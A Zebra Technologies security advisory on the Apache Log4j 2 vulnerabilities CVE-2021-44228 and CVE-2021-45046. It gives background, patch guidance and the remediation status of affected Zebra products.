Apache Log4j 2 Vulnerability (CVE-2021-44228) Information / [CVE-2021-45046 (Dec 14, 2021)]

Zebra Technologies is actively following the security vulnerability in the open-source Apache “Log4j 2" utility (CVE-2021-44228). We are currently assessing the potential impact of the vulnerability for Zebra products and solutions. This is an ongoing event, and we will continue to provide updates through our customer communications channels. Our support page will be updated to include relevant information as it becomes available.

Background: The Apache Log4j utility is a commonly used component for logging requests. On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code.

On December 10, 2021, NIST published a critical Common Vulnerabilities and Exposure alert, CVE-2021-44228. More specifically, Java Naming Directory Interface (JNDI) features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from remote servers when message lookup substitution is enabled.

CVE-2021-45046 (Dec 14, 2021)

Description:  It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

What should I do to protect myself?

We strongly encourage customers to consult with their SW vendors and obtain patches and update as soon as possible for all impacted SW applications

For internally developed servers or applications we strongly encourage customers who manage environments containing Log4j 2 to update to version Log4j 2.15.0 or later per Apache's guidance https://logging.apache.org/log4j/2.x/

SUPPORT PAGES FOR IMPACTED PRODUCTS:

Affected Product CVE-2021-44228 (Apache Log4j 2) Date CVE-2021-45046 Date
Visibility IQ (VIQF) Limited exposure to this vulnerability; remediation complete Remediated
Dec 12th, 2021
Not affected N/A
SOTI MobiControl v 14.3 to 15.4.1 – Hosted Environments Limited exposure to this vulnerability.  Engineering is actively working to resolve Remediated
Dec 22nd, 2021
Limited exposure to this vulnerability.  Engineering is actively working to resolve Remediated
Dec 22nd, 2021
PTT Pro Windows/Desktop (G1, G2) Upon continued assessment of vulnerability the following Workforce Connect (WFC) products have been determined to not be impacted by this vulnerability N/A Upon continued assessment of vulnerability the following Workforce Connect (WFC) products have been determined to not be impacted by this vulnerability N/A
Zebra Enterprise Messaging After investigation; using version not impacted by this vulnerability. Remediated
Dec 15, 2021
Not affected  N/A
Fetch Limited exposure to this vulnerability. Engineering mitigated issue Remediated
Dec 12th, 2021

Limited exposure to this vulnerability.  Engineering is actively working to resolve Upon continued assessment of the vulnerability, this product have been determined to not be impacted.
Reflexis Full exposure to this vulnerability; Engineering is actively working to resolve Remediated Dec 29th, 2021 Full exposure to this vulnerability; Engineering is actively working to resolve
Remediated Jan 7th, 2022
Visibility Server Software (ZLS) After investigation; using version not impacted by this vulnerability. Remediated
Dec 14, 2021
After investigation; using version not impacted by this vulnerability.  N/A
MotionWorks Enterprise (ZLS) Remediated vulnerability by setting -Dlog4j2.formatMsgNoLookups=true when starting JVM Remediated
Dec 14, 2021
Low Risk - The components use log4j will only receive requests when the user is authenticated. They do not log arbitrary user inputs.  Remediated
Dec 19, 2021
Zebra Profitect (ZPA) Limited exposure to this vulnerability. Engineering as removed IntelliJ and Log4J to remediate Remediated
Dec 10th, 2021
Not affected  N/A

Disclaimer: Zebra makes every attempt to release security updates on or about the time that Google releases its respective security bulletin. However, delivery time of security updates may vary depending on the region, product model, and third party software suppliers. Under some circumstances, the OS must be updated to the latest maintenance release prior to installing the security updates. Individual product updates will provide specific guidance.

Unless otherwise noted, there have been no reports of active customer exploitation or abuse from these newly reported issues.



Are you aware of a potential security issue with a Zebra Technologies product?